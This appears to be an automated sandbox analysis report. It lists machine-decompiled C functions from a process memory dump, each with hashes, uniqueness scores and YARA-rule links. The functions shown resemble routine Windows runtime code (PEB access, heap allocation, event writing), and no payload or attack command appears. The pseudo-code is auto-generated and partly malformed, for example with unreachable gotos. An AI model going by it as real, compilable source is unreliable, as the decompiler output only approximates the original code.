Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction ID: d5d3b27b5a53d4d0cfc529a0449df36cdb2ad9861928c4eb7fb5412d515a43c1
Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction Fuzzy Hash: CFE0ED723406006BE761EE0ADC80B1376A9EF82B20F04407EB9001E282CAF6D80887A8

Uniqueness

Uniqueness Score: -1.00%

Function 034F8D34, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E034F8D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x351d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E03447D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E0346B640(E03469AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x034f8d34
0x034f8d43
0x034f8d4b
0x034f8d4e
0x034f8d52
0x034f8d5c
0x034f8d6e
0x034f8d5e
0x034f8d67
0x034f8d67
0x034f8d79
0x034f8d7a
0x034f8d7c
0x034f8d81
0x034f8d94

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0831aa0be4e4c5c1356f9a3ff10d20895319849c10f0bec3008061dd6fc6b14
Instruction ID: 5f8b7e5e819f35d207732c81cc96241355160ebea072ae1721d58495b151362e
Opcode Fuzzy Hash: e0831aa0be4e4c5c1356f9a3ff10d20895319849c10f0bec3008061dd6fc6b14
Instruction Fuzzy Hash: 7AF0BE74A04708AFDB04EFB9D441A6EB7B4EF18300F1480AAE915EF390EA34D901CB59

Uniqueness

Uniqueness Score: -1.00%

Function 034E2073, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E034E2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E034DFD22(__ecx);
				_t19 =  *0x351849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x3518748; // 0x0
					if(__eflags <= 0) {
						E034E1C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x3518724 & 0x00000004;
							if(( *0x3518724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x3518724; // 0x1
					return E034D8DF1(__ebx, 0xc0000374, 0x3515890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}

0x034e2076
0x034e2078
0x034e207d
0x034e2083
0x034e20a4
0x034e20aa
0x034e20ac
0x034e20b7
0x034e20ba
0x034e20bc
0x034e20c9
0x034e20c9
0x034e20d0
0x034e20d2
0x00000000
0x034e20d2
0x034e20be
0x034e20c3
0x034e20c5
0x034e20c7
0x00000000
0x00000000
0x034e20c7
0x034e20bc
0x034e20d4
0x034e2085
0x034e2085
0x034e20a3
0x034e20a3

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98de42b9b25127b23a0911cd9f01e4b2136f92e775ea4589dfb83ea31c2b1509
Instruction ID: 25ffe8b85fc2dbb0d2c96aca31715cf06fa7a4c08b97ef39425847d88cab1bc0
Opcode Fuzzy Hash: 98de42b9b25127b23a0911cd9f01e4b2136f92e775ea4589dfb83ea31c2b1509
Instruction Fuzzy Hash: DEF0272B4112944FDE32FB2570116E22BD9D785112B0D0887D5901F348C9B58887EA1C

Uniqueness

Uniqueness Score: -1.00%

Function 034F8B58, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E034F8B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x351d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E03447D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0346B640(E03469AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x034f8b67
0x034f8b6f
0x034f8b72
0x034f8b7d
0x034f8b8f
0x034f8b7f
0x034f8b88
0x034f8b88
0x034f8b9a
0x034f8b9b
0x034f8b9d
0x034f8ba2
0x034f8bb5

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8041ce245c0de5d6dab0d5af75394c4a3dcb90726c1e21bbb8bfc7a9628033b0
Instruction ID: 1e57d5407960e2840f51fb197582726cdebe542c50487ff4240673b51dba815e
Opcode Fuzzy Hash: 8041ce245c0de5d6dab0d5af75394c4a3dcb90726c1e21bbb8bfc7a9628033b0
Instruction Fuzzy Hash: DFF05EB4A14258AFDB00EFA9D906E6EB7B4EB04200F04045ABA15DF391EB74D901C799

Uniqueness

Uniqueness Score: -1.00%

Function 03424F2E, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03424F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E034F88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E0344C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x3401030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}

0x03424f2e
0x03424f34
0x03424f38
0x03480b85
0x03480b85
0x03480b89
0x03480b9a
0x03480b9a
0x03480b9f
0x00000000
0x03480b9f
0x03480b94
0x03480b98
0x00000000
0x00000000
0x00000000
0x03480b98
0x03424f3e
0x03424f48
0x00000000
0x03424f6e
0x00000000
0x03424f70

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4301820c26daab735c69d974bed645692fffbd27f919d436e66f094b047e8cbe
Instruction ID: 8f4a7a2e71b790f365fa6cd90dfba5717c023a486023b560cd39d3d9d52a61dd
Opcode Fuzzy Hash: 4301820c26daab735c69d974bed645692fffbd27f919d436e66f094b047e8cbe
Instruction Fuzzy Hash: 13F09A36522694AED771E799C180B2BB798AB006B8F4944B6D4058FA21C724E848C648

Uniqueness

Uniqueness Score: -1.00%

Function 0344746D, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0344746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E0343EB70(__ecx, 0x35179a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E034695D0();
							L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}

0x0344746d
0x0344746d
0x0344746d
0x03447471
0x03447488
0x0348f92d
0x0344748e
0x03447491
0x03447495
0x0348f937
0x0348f93a
0x0348f94e
0x0348f953
0x0348f956
0x0348f956
0x03447495
0x00000000
0x03447488
0x03447473
0x03447478
0x0344747d
0x03447481
0x00000000
0x03447481
0x0344747d
0x0344747a
0x00000000

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cb9a00085f6613f4b16dc2c08ab592ad568119c817bdb28f6b8c33fbd9d932f
Instruction ID: f03591d022ec8db42f5a48cddbaecfe4dda406d7eaca683301b1ce0ca00c1a7d
Opcode Fuzzy Hash: 3cb9a00085f6613f4b16dc2c08ab592ad568119c817bdb28f6b8c33fbd9d932f
Instruction Fuzzy Hash: D1F0B439901244AEEF11DB6CE540B7ABF71AF04310F08057BD4F1AF260E76498038B8D

Uniqueness

Uniqueness Score: -1.00%

Function 034F8CD6, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E034F8CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x351d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E03447D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0346B640(E03469AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x034f8ce5
0x034f8ced
0x034f8cf0
0x034f8cfb
0x034f8d0d
0x034f8cfd
0x034f8d06
0x034f8d06
0x034f8d18
0x034f8d19
0x034f8d1b
0x034f8d20
0x034f8d33

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3f0f017019f65734369b4c4620cd9835e01d81b754e701fe19f2f785a234108
Instruction ID: 8221143897499d43109eff8b0f0f6fc5568d85c87aa51db5cb953fa5fc30fff7
Opcode Fuzzy Hash: f3f0f017019f65734369b4c4620cd9835e01d81b754e701fe19f2f785a234108
Instruction Fuzzy Hash: BAF08275A04648AFDB04EFA9E945E6EB7B4EF18200F14019AE915EF390EA34D900C759

Uniqueness

Uniqueness Score: -1.00%

Function 0345A44B, Relevance: .0, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0345A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x3517b9c; // 0x0
				_t15 = __ecx;
				_t16 = L03444620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E0346FA60(_t17, 0, _t15 << 2);
				return _t17;
			}

0x0345a44b
0x0345a453
0x0345a472
0x0345a476
0x00000000
0x0345a493
0x0345a47a
0x0345a47f
0x0345a486
0x00000000

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b1e5069168b6c5d78ad24a8ec03ecd413bc72859de3c7825f433120d0e610f9
Instruction ID: f214be8edfffe8aa43af336ecab867867ddd1727fad389307c8ce31193b80437
Opcode Fuzzy Hash: 9b1e5069168b6c5d78ad24a8ec03ecd413bc72859de3c7825f433120d0e610f9
Instruction Fuzzy Hash: 47E09272A01421AFD212DF59BC00F67B39DEBD5A51F09413AF904CF224D628DD06C7E4

Uniqueness

Uniqueness Score: -1.00%

Function 0342F358, Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0342F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E0345F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L03444620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}

0x0342f35d
0x0342f361
0x0342f367
0x0342f372
0x0342f38c
0x0342f38c
0x0342f394

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction ID: 2508a020675cf9e6dc3e7e3969532e089ad41f341b0b2c9bbe8dae9b42ab1d3b
Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction Fuzzy Hash: 9FE0D832A40228FFDB21E6DA9D05F5BFFBCDB44A60F440156F904EF150D5649D00C2D0

Uniqueness

Uniqueness Score: -1.00%

Function 0343FF60, Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0343FF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x34011a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E034F88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E03440050(_t14);
				}
			}

0x0343ff66
0x0343ff6b
0x00000000
0x0343ff8f
0x00000000
0x0343ff8f

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77259b056aff8609cba582f2d14d25d94f8378d97e5cb8f8c4625eb9c598b6ab
Instruction ID: f78552b8a621c35a748158f6cb3c9e7f1018260f8d402a1f9caa7fbd145bab55
Opcode Fuzzy Hash: 77259b056aff8609cba582f2d14d25d94f8378d97e5cb8f8c4625eb9c598b6ab
Instruction Fuzzy Hash: 49E0DFB4A053049FD734DB52D040F27779C9B4B729F1D80AFE8084FA01C621D885C20E

Uniqueness

Uniqueness Score: -1.00%

Function 034DD380, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E034DD380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L0342E8B0(__ecx, _a4, 0xfff);
					L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}

0x034dd38a
0x034dd39b
0x034dd3b1
0x00000000
0x034dd3b6
0x00000000

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction ID: 134062e21390ddcf6cf5b81af87e261053370a34cb8601fc59a09864243a5d4d
Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction Fuzzy Hash: C3E0C235280314BBEB229E44CC00F697B1AEF417A0F104036FE08AFB90C671AC92D6C8

Uniqueness

Uniqueness Score: -1.00%

Function 034B41E8, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E034B41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x35008f0);
				_t5 = E0347D08C(__ebx, __edi, __esi);
				if( *0x35187ec == 0) {
					E0343EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x35187ec == 0) {
						 *0x35187f0 = 0x35187ec;
						 *0x35187ec = 0x35187ec;
						 *0x35187e8 = 0x35187e4;
						 *0x35187e4 = 0x35187e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L034B4248();
				}
				return E0347D0D1(_t5);
			}

0x034b41e8
0x034b41ea
0x034b41ef
0x034b41fb
0x034b4206
0x034b420b
0x034b4216
0x034b421d
0x034b4222
0x034b422c
0x034b4231
0x034b4231
0x034b4236
0x034b423d
0x034b423d
0x034b4247

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e104602a53e897cdbfbdd92a65af747e8f10550f1c344d37e17ab618a10c2e16
Instruction ID: dec9a40eb884098063ea9f2e0891626e8d0f4bf12538256afc38cdcbb88c4580
Opcode Fuzzy Hash: e104602a53e897cdbfbdd92a65af747e8f10550f1c344d37e17ab618a10c2e16
Instruction Fuzzy Hash: AAF0157A921724CEDBB8EFAAA500B5836B4FB44311F00416A81508F3A9C73644CAEF19

Uniqueness

Uniqueness Score: -1.00%

Function 0345A185, Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0345A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x35167e4 >= 0xa) {
					if(_t5 < 0x3516800 || _t5 >= 0x3516900) {
						return L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E03440010(0x35167e0, _t5);
				}
			}

0x0345a190
0x0345a1a6
0x0345a1c2
0x00000000
0x00000000
0x00000000
0x0345a192
0x0345a192
0x0345a19f
0x0345a19f

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94b1433da0525eb3e31c4636a675c89e782b34631676e5b3992e32c5c8d0252a
Instruction ID: b9bad5d72d269b4a33e4c2096c0a890e00b580378f41b5d677a79f349d3c4153
Opcode Fuzzy Hash: 94b1433da0525eb3e31c4636a675c89e782b34631676e5b3992e32c5c8d0252a
Instruction Fuzzy Hash: 1DD02B22A210041FE71EE714AA14B217296F780700F30091FFA030E6B5DB50C8F5D10C

Uniqueness

Uniqueness Score: -1.00%

Function 034516E0, Relevance: .0, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E034516E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E03451710(0x35167e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L03444620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}

0x034516e8
0x034516ef
0x034516f3
0x034516fe
0x00000000
0x03451700
0x0345170d
0x0345170d
0x034516f2
0x034516f2
0x034516f2
0x034516f2

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e96a55b98ef5dbb9eb5e3f43d6207e0d95fba1ca3444901c374b07806dd56fc9
Instruction ID: 6cd511ee1e295884247dbfbefce7aa702a36c058327291769cccbf3a9620ecfc
Opcode Fuzzy Hash: e96a55b98ef5dbb9eb5e3f43d6207e0d95fba1ca3444901c374b07806dd56fc9
Instruction Fuzzy Hash: B8D0A73124120057EE2DDB169804B157251EB80781F3C006EF9074D9E2CFA4CCA2E44C

Uniqueness

Uniqueness Score: -1.00%

Function 034A53CA, Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E034A53CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E0343EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}

0x034a53ca
0x034a53ce
0x034a53d9
0x034a53de
0x034a53e1
0x034a53e1
0x034a53e6
0x034a53f3
0x00000000
0x034a53f8
0x034a53fb

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction ID: c0113c0c77d36978fcfd59f03efa8e16731497087268bd737f6a08a1ad2604a8
Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction Fuzzy Hash: 8EE04636900B809FCB12DB49C650F4AB7F5BB85B00F180459A4085F660C624A800CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0343AAB0, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0343AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}

0x0343aab6
0x0343aabb
0x0348a442
0x00000000
0x0348a448
0x0348a454
0x0348a454
0x0343aac1
0x0343aac1
0x0343aac6
0x0343aac6

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: 411fac0a729983be799e7e25e7c2b45c1bc505393b037eab99567c12ead5e290
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: 52D0E935352980CFD616DB1DC554B1673A8FB45B44FC904D1E541CF761E66DD944CA04

Uniqueness

Uniqueness Score: -1.00%

Function 034535A1, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E034535A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E0343EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}

0x034535a1
0x034535a1
0x034535a5
0x034535ab
0x034535ab
0x034535b5
0x00000000
0x034535c1
0x034535b7

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: c7a53ce50fbf4aeab7d79252f8533ad2567163966931da45f4e613a06fc1f33f
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: DED05E39802188DDDB83EF10C1247697261AB00284F5830DBA8030E5538235494A8608

Uniqueness

Uniqueness Score: -1.00%

Function 0342DB40, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0342DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L03444620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}

0x0342db4d
0x0342db54
0x0342db5f
0x0342db56
0x0342db56
0x0342db5c
0x0342db5c

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: f80423a169621c03db19089c07ae0dc4c763c5293eed8cdcc3ae382602664484
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: 8AC08C30280B00AEEB22AF21CD01B01BAA0BB01B41F8800A1B300EE4F0DB7CD801E604

Uniqueness

Uniqueness Score: -1.00%

Function 034AA537, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E034AA537(intOrPtr _a4, intOrPtr _a8) {

				return L03448E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}

0x034aa553

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
